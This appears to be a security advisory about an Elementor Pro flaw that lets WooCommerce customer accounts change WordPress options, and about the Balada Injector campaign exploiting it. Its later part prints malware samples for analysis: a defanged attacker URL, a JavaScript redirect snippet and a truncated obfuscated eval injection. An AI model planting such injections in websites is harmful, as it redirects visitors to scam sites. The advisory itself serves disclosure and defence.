On March 22nd, 2023 a security patch was issued for the popular website builder plugin Elementor Pro. Website administrators using this plugin should immediately patch to at least version 3.11.7 to avoid a potential website compromise.
The security issue is reported to affect only the Pro version of the plugin and not the free version hosted at wordpress.org.
Vulnerability details
The vulnerability allows authenticated users to arbitrarily change wp_options values within the database via the AJAX action of Elementor Pro working in conjunction with WooCommerce.
Since WooCommerce websites allow registration for customer accounts, any website with user registration enabled with the Elementor Pro plugin and WooCommerce installed is liable to be exploited if using the vulnerable version.
The plugin uses the update_option function which is used by WordPress to change database values for website settings, such as allowing shop admins to change some options within their site database. However, this recent vulnerability results from user input not being validated properly and the function does not check whether only high-privileged users are using it.
When both the Elementor Pro and WooCommerce plugins are active (a rather common combination within WordPress websites) this can lead to arbitrary wp_options changes such as:
- siteurl value
- default user role
- user registration
We have also observed multiple users reporting that their administrator user name was changed to ad@example.com after this vulnerability was exploited on their website, as well as new administrator users added using the pattern wpnew_*** within the database.
Attacks often originate from the following IP addresses:
193.169.194.63 193.169.195.64 194.135.30.6
More in-depth technical details about the vulnerability can be found at Nintechnet where it was originally reported.
Malware campaign already active
The attackers have wasted no time in exploiting this vulnerability and we have already seen the beginnings of a mass-infection riding on the coattails of this vulnerability before website administrators have had the opportunity to update.
So far, the most common payload that we have observed has been for the attackers to replace the siteurl wp_option value with the following URL:
hxxps://away[.]trackersline[.]com/do.js?l=1#
This malicious JavaScript file is quite simple and creates a window.location redirect referencing a PHP script on the same domain:
window.stop();var step = "hxxps://away[.]trackersline[.]com/away.php?id=43436-22-4734573234"; document.location.href=step; window.location.replace(step);
So far we have seen these injections redirect users to various sketchy websites via a long chain of hops which usually include koldasee[.]ru and domains like thebestprizes[.]life.
The final destination can be anything based on your location and browser – for example, a gambling site like this one:
This seems to be a continuation of the years-long malware campaign that we recently dubbed the “Balada Injector” which we first started tracking in 2017. This malware is notorious for exploiting any and all vulnerable plugins or themes that it can identify and redirect website visitors to scam and/or spam websites which often install adware or other potentially unwanted programs (PUPs) on users’ computers.
The trackersline[.]com domain was registered on the same day (Feb 15, 2023) and using the same registrar (ERANET INTERNATIONAL LIMITED) as the previous Balada Injector domain statisticline[.]com. The statisticline[.]com wave of the campaign is know for injections like this:
<script id='globalsway'>var z =String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101, …skipped… 112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(/*674867468*/t);</script>
Mitigation steps
Elementor Pro users should patch their software immediately to at least version 3.11.7 to mitigate risk. Our research team has also released an update to ensure that users of the Sucuri web application firewall are protected from this vulnerability.
This is a great reminder of why issuing software updates as soon as possible is crucial for website security and preventing attacks, and also that website administrators who employ automatic updates/patches are among the least at risk of compromise.